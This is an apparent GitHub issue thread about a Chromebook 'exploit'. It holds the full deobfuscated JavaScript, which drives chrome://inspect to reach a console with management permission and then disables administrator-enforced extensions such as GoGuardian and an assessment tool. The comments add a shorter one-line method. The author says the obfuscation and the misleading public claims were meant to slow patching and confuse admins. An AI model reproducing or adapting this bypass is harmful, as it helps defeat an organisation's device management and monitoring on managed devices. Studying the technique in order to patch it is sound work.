
Deobfuscated code #3

Closed luphoria closed 1 year ago

luphoria commented 1 year ago

Cool exploit, but no clue how it works other than attaching to helper internal extensions to disable others. Why is it obfuscated?

gl91306 commented 1 year ago

Here's the code, deobfuscated by me:

(function() {
    // Self-invoking script with two modes, chosen at the bottom by
    // location.origin. On chrome://inspect it polls the page's extension and
    // target lists and clicks their ".action" controls; on a
    // chrome-extension:// origin it calls chrome.management.setEnabled on the
    // IDs in D. The instruction pages it opens tell the user to paste the
    // clipboard into a console, so the chain depends on a manual step.
    // NOTE(review): the IDs below are copied as-is from the listing; the code
    // does not say which installed extension each one is.

    console.log("Chaos Exploit V1.3");
    console.log("^");

    // Targets passed to k(): six extension IDs plus the literal string
    // "GoGuardian", which is a display name rather than an ID (setEnabled is
    // still called with it).
    const D = ["hpamladjhjimikgajbgjmcopoejbpnfp", "kbohafcopfpigkjdimdcdgenlhkmhbnc", "iheobagjkfklnlikgihanlhcddjoihkg", "pgmjaihnmedpcdkjcgigocogcbffgkbn", "jaoebcikabjppaclpgbodmmnfjihdngk", "ifeifkfohlobcbhmlfkenopaimbmnahb", "GoGuardian"];

    // HTML body handed to openLink() once F() finds a matching extension row.
    let n = `<h1>Exploit in progress</h1><h2>Click on "<u>Console</u>" in the window that pops up.</h2><h2>Then, press Control+V and then Enter.<h2>You can close this page now.</h2>`;

    let A = null;   // setInterval handle for F()
    let u = null;   // setTimeout handle for T() (cleared with clearInterval below)

    let f = null,   // setTimeout handle for Q()
        K = false,  // set to true by Q(); not read anywhere in this listing
        Y = 0;      // number of F() polls so far

    // Polls the rows of #extensions-list. When a row named
    // "Assessment Assistant" or "Chrome Media Router" is present it runs Z(),
    // opens the instruction page n, clicks that row's ".action" 100 ms later
    // and cancels all three timers. Gives up with "Error 2" once Y exceeds 50.
    function F() {
        let O = document.querySelectorAll("#extensions-list .row");
        // NOTE(review): querySelectorAll returns a NodeList (possibly empty),
        // never null, so "Error 1" is unreachable; an empty list just falls
        // through to the Y counter.
        if (!O) {
            console.log("Error 1");
            clearInterval(A);
            return;
        }
        for (let J = 0; J < O.length; J++) {
            console.log(J)
            if (O[J].querySelector(".name").textContent == "Assessment Assistant" || O[J].querySelector(".name").textContent == "Chrome Media Router") {
                console.log(O[J].querySelector(".name").textContent);
                Z();
                openLink(n);
                // Deferred so the click happens after Z()'s click and the
                // new window have been dispatched.
                setTimeout(() => {
                    O[J].querySelector(".action").click();
                }, 100);
                clearInterval(A);
                clearInterval(u);
                clearInterval(f);
                return
            }
        }
        Y++;
        if (Y > 50) {
            console.log("Error 2")
            clearInterval(A);
            return;
        }
    }

    // Runs once, 3 s after start (timer f): opens a second instruction page,
    // sets K and starts the T() polling loop.
    function Q() {
        let i = document.querySelectorAll("#pages-list > .row");
        // NOTE(review): same unreachable null check as in F(); i is otherwise
        // unused.
        if (!i) {
            console.log("Error 4");
            return;
        }
        openLink("<h1>Exploit in progress</h1><h2>Wait for the inspect pop-up to open <u>in a new window</u></h2><h2>You can close this page at the end</h2>");
        K = true;
        T();
    }

    // Re-arms itself every 500 ms until a #pages-list row whose ".url" text
    // starts with "blob" exists, then clicks that row's ".action" and stops.
    // NOTE(review): u is a setTimeout handle but is cancelled with
    // clearInterval; the HTML spec keeps both kinds of timer in one ID list so
    // this still works, but clearTimeout would match the creation call.
    function T() {
        let rows = document.querySelectorAll("#pages-list > .row");
        for (let r = 0; r < rows.length; r++) {
            let row = rows[r];
            if (row.querySelector(".url").innerText.startsWith("blob")) {
                row.querySelector(".action").click();
                clearInterval(u);
                return;
            }
        }
        u = setTimeout(T, 500);
    }

    // Clicks the ".action" of the first #pages-list row whose ".name" text
    // starts with "Inspect"; does nothing if there is no such row.
    function Z() {
        let rows = document.querySelectorAll("#pages-list > .row");
        for (let r = 0; r < rows.length; r++) {
            let row = rows[r];
            if (row.querySelector(".name").innerText.startsWith("Inspect")) {
                row.querySelector(".action").click();
                return;
            }
        }
    }

    // Opens a new window on a blob: URL whose content is the given string,
    // served as text/html. The parameter is named url but carries markup, not
    // an address; the blob URL is never revoked.
    function openLink(url) {
        const header = {
            type: "text/html"
        };
        open(URL.createObjectURL(new File([url], "", header)));
    }

    // Calls chrome.management.setEnabled(id, false) for each entry of y, then
    // opens the project's done page and closes this window after 2 s. The
    // setEnabled promises are not awaited or error-checked, so a rejected call
    // (e.g. the "cannot be modified by user" error discussed in this thread)
    // is silently dropped and "Done" is logged regardless.
    function k(y) {
        for (let r = 0; r < y.length; r++) {
            chrome.management.setEnabled(y[r], false);
        }
        console.log("Injector V1.0 Done");
        open("https://xlak.github.io/chaos/done.html");
        setTimeout(close, 2e3);
    }
    // Entry dispatch. Outside an extension origin the script only proceeds on
    // chrome://inspect, where it starts the F() interval (100 ms) and the Q()
    // timeout (3 s). On an extension origin it requires chrome.management,
    // then disables D and lists all extensions.
    if (!location.origin.startsWith("chrome-extension://")) {
        if (location.origin != "chrome://inspect") {
            console.log("Wrong page!");
            return;
        }
        A = setInterval(F, 100);
        f = setTimeout(Q, 3e3);
    } else {
        if (!chrome.management) {
            console.log("Error 5");
            return;
        }
        k(D);
        // NOTE(review): extensionList is filled but never read, and the
        // filter compares extension.name against D, which holds IDs, so only
        // an extension whose display name equals one of those strings would
        // be collected. This block has no effect on what k(D) already did.
        let extensionList = [];
        chrome.management.getAll().then(extensions => {
            extensions.forEach(extension => {
                D.indexOf(extension.name) > -1 && extensionList.push(extension.id);
            });
        });
    }
}());

It's literally just inspect ltbeef with unnecessary bloat. You simply need to go to chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/manifest.json and run chrome.management.setEnabled((extension id), !1); And this is not a kernel level bypass as you stated on r/chrome. That is total bullshit. It's not a privilege escalation exploit either. An example of privilege escalation would be user -> chronos, or chronos -> root. There's also no reason for the code to start at chrome://inspect and then navigate over to chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk or whatever the id for "Chrome Media Router" is.

luphoria commented 1 year ago

(That's an impressive deobfuscation job, by the way) Everything said here is about right tho. It's really confusing that the methodology is so roundabout, when you could just run the setEnabled api on chrome://extensions. I was hoping it would be more involved than that.

xlak commented 1 year ago

Nice deobfuscation job. The code is obfuscated to protect it from being re-branded without permission, and to try to keep it from being patched for longer. However, the comments and the layout are lost through obfuscation which makes what it's doing seem much more confusing.

There is a reason behind why this works the way that it does. It's basically a script to automate opening a console with management permissions, which would be even more tricky otherwise. Running setEnabled from chrome://extensions refuses to work for managed extensions, with the error message `Error: Extension kbohafcopfpigkjdimdcdgenlhkmhbnc cannot be modified by user.` Directly visiting a page from the Chrome Media Router does not seem to work either.

The stuff said on Reddit is just supposed to make it more confusing for admins to block. Most of it is indeed BS, and I should probably delete it.

The full source code is available upon request. Contact me on Discord: xlak_#5475